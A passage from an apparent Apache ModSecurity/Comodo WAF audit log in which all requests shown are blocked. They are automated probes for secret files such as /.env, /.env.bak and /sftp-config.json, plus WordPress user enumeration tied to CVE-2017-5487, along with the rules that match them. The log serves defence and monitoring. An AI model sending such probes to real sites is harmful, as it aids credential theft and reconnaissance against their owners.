[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748786058863747 2393 (- - -) Stopwatch2: 1748786058863747 2393; combined=1344, p1=419, p2=886, p3=0, p4=0, p5=39, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ea0da4d-Z-- --fdd33b0d-A-- [01/Jun/2025:20:57:28 +0700] aDxcSAQHT18O7PnXxsRgKAAAAJc 103.236.140.4 46838 103.236.140.4 8181 --fdd33b0d-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.32.126.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.32.126.214 X-Forwarded-Proto: http Connection: close --fdd33b0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdd33b0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748786248648427 848 (- - -) Stopwatch2: 1748786248648427 848; combined=303, p1=252, p2=0, p3=0, p4=0, p5=51, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdd33b0d-Z-- --93da3c2f-A-- [01/Jun/2025:23:48:23 +0700] aDyEVwQ4kZQGAOBHoB7e_wAAAMA 103.236.140.4 53004 103.236.140.4 8181 --93da3c2f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15 Accept-Charset: utf-8 --93da3c2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93da3c2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748796503825674 818 (- - -) Stopwatch2: 1748796503825674 818; combined=380, p1=336, p2=0, p3=0, p4=0, p5=43, sr=125, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93da3c2f-Z-- --6ac19018-A-- [02/Jun/2025:00:07:21 +0700] aDyIyQQHT18O7PnXxsSoCAAAAIk 103.236.140.4 45148 103.236.140.4 8181 --6ac19018-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 154.222.132.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.222.132.2 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6ac19018-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ac19018-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748797641106913 4149 (- - -) Stopwatch2: 1748797641106913 4149; combined=2233, p1=662, p2=1529, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ac19018-Z-- --3b73241f-A-- [02/Jun/2025:00:13:23 +0700] aDyKM-4LjVe0Eerk_ZYt4AAAAEw 103.236.140.4 47882 103.236.140.4 8181 --3b73241f-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 167.71.81.114 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 167.71.81.114 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --3b73241f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b73241f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748798003385401 781 (- - -) Stopwatch2: 1748798003385401 781; combined=283, p1=250, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b73241f-Z-- --5eb36c09-A-- [02/Jun/2025:01:13:09 +0700] aDyYNQQ4kZQGAOBHoB5AUAAAAMU 103.236.140.4 41714 103.236.140.4 8181 --5eb36c09-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.187.152.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.187.152.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5eb36c09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5eb36c09-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748801589850421 3814 (- - -) Stopwatch2: 1748801589850421 3814; combined=2103, p1=638, p2=1429, p3=0, p4=0, p5=35, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5eb36c09-Z-- --6a3b1d3e-A-- [02/Jun/2025:01:17:32 +0700] aDyZPAQ4kZQGAOBHoB5E_QAAANA 103.236.140.4 35598 103.236.140.4 8181 --6a3b1d3e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 34.83.193.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 34.83.193.157 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6a3b1d3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a3b1d3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748801852176192 3664 (- - -) Stopwatch2: 1748801852176192 3664; combined=1908, p1=570, p2=1304, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a3b1d3e-Z-- --42bb0528-A-- [02/Jun/2025:01:32:30 +0700] aDycvgQHT18O7PnXxsQSlwAAAJY 103.236.140.4 53986 103.236.140.4 8181 --42bb0528-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 112.198.178.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 112.198.178.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --42bb0528-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42bb0528-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748802750948920 3760 (- - -) Stopwatch2: 1748802750948920 3760; combined=2185, p1=665, p2=1480, p3=0, p4=0, p5=39, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42bb0528-Z-- --76ef7175-A-- [02/Jun/2025:02:13:33 +0700] aDymXUaTRmdfB-FaJjkEQAAAABA 103.236.140.4 35288 103.236.140.4 8181 --76ef7175-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; Nexus 9 Build/NRD90R) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Safari/537.36 Accept-Charset: utf-8 --76ef7175-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76ef7175-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748805213258867 940 (- - -) Stopwatch2: 1748805213258867 940; combined=428, p1=362, p2=0, p3=0, p4=0, p5=65, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76ef7175-Z-- --9141cc52-A-- [02/Jun/2025:03:15:20 +0700] aDy02EaTRmdfB-FaJjlPswAAAAA 103.236.140.4 35476 103.236.140.4 8181 --9141cc52-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 8.130.160.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 8.130.160.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9141cc52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9141cc52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748808920053284 3709 (- - -) Stopwatch2: 1748808920053284 3709; combined=1658, p1=650, p2=962, p3=0, p4=0, p5=46, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9141cc52-Z-- --f84b3c42-A-- [02/Jun/2025:03:27:19 +0700] aDy3p0aTRmdfB-FaJjlV3AAAAA0 103.236.140.4 39070 103.236.140.4 8181 --f84b3c42-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 88.81.77.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 88.81.77.56 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f84b3c42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f84b3c42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748809639361157 2691 (- - -) Stopwatch2: 1748809639361157 2691; combined=1166, p1=366, p2=777, p3=0, p4=0, p5=23, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f84b3c42-Z-- --a83eaa73-A-- [02/Jun/2025:03:36:43 +0700] aDy529G4Cudp_oIcbnOiuAAAAAU 103.236.140.4 51382 103.236.140.4 8181 --a83eaa73-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.2; en-us; sdk Build/MR1) AppleWebKit/535.19 (KHTML, like Gecko) Version/4.2 Safari/535.19 Accept-Charset: utf-8 --a83eaa73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a83eaa73-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748810203800491 1146 (- - -) Stopwatch2: 1748810203800491 1146; combined=384, p1=343, p2=0, p3=0, p4=0, p5=41, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a83eaa73-Z-- --95d2a457-A-- [02/Jun/2025:03:49:00 +0700] aDy8vNG4Cudp_oIcbnOixgAAAAg 103.236.140.4 51448 103.236.140.4 8181 --95d2a457-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.236.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.236.252 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --95d2a457-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95d2a457-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748810940610915 729 (- - -) Stopwatch2: 1748810940610915 729; combined=303, p1=272, p2=0, p3=0, p4=0, p5=31, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95d2a457-Z-- --10242c76-A-- [02/Jun/2025:03:54:30 +0700] aDy-BtG4Cudp_oIcbnOi0wAAAAc 103.236.140.4 51504 103.236.140.4 8181 --10242c76-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 196.251.67.143 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 196.251.67.143 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --10242c76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10242c76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748811270259161 898 (- - -) Stopwatch2: 1748811270259161 898; combined=361, p1=322, p2=0, p3=0, p4=0, p5=39, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10242c76-Z-- --24bb9875-A-- [02/Jun/2025:04:17:17 +0700] aDzDXe6eDjh4wF4csdthzgAAAJg 103.236.140.4 51646 103.236.140.4 8181 --24bb9875-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1 Accept-Charset: utf-8 --24bb9875-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24bb9875-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748812637279465 1055 (- - -) Stopwatch2: 1748812637279465 1055; combined=348, p1=309, p2=0, p3=0, p4=0, p5=38, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24bb9875-Z-- --df91ab0e-A-- [02/Jun/2025:04:23:33 +0700] aDzE1X8VMK8tZef_-m_JQwAAAEU 103.236.140.4 51760 103.236.140.4 8181 --df91ab0e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.241.129.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.241.129.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --df91ab0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df91ab0e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748813013255763 3943 (- - -) Stopwatch2: 1748813013255763 3943; combined=1565, p1=561, p2=972, p3=0, p4=0, p5=32, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df91ab0e-Z-- --0169c620-A-- [02/Jun/2025:04:54:28 +0700] aDzMFH8VMK8tZef_-m_JYAAAAE8 103.236.140.4 51944 103.236.140.4 8181 --0169c620-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.32.126.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.32.126.214 X-Forwarded-Proto: http Connection: close --0169c620-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0169c620-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748814868502961 985 (- - -) Stopwatch2: 1748814868502961 985; combined=398, p1=354, p2=0, p3=0, p4=0, p5=44, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0169c620-Z-- --0e48d213-A-- [02/Jun/2025:05:00:25 +0700] aDzNee6eDjh4wF4csdth7AAAAIU 103.236.140.4 51982 103.236.140.4 8181 --0e48d213-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.241.208.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.241.208.204 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --0e48d213-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e48d213-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748815225538135 2334 (- - -) Stopwatch2: 1748815225538135 2334; combined=1055, p1=368, p2=661, p3=0, p4=0, p5=26, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e48d213-Z-- --c683f73e-A-- [02/Jun/2025:05:19:00 +0700] aDzR1EA6be0-boUGPH14DAAAAM0 103.236.140.4 52266 103.236.140.4 8181 --c683f73e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.122.201.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.122.201.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c683f73e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c683f73e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748816340826780 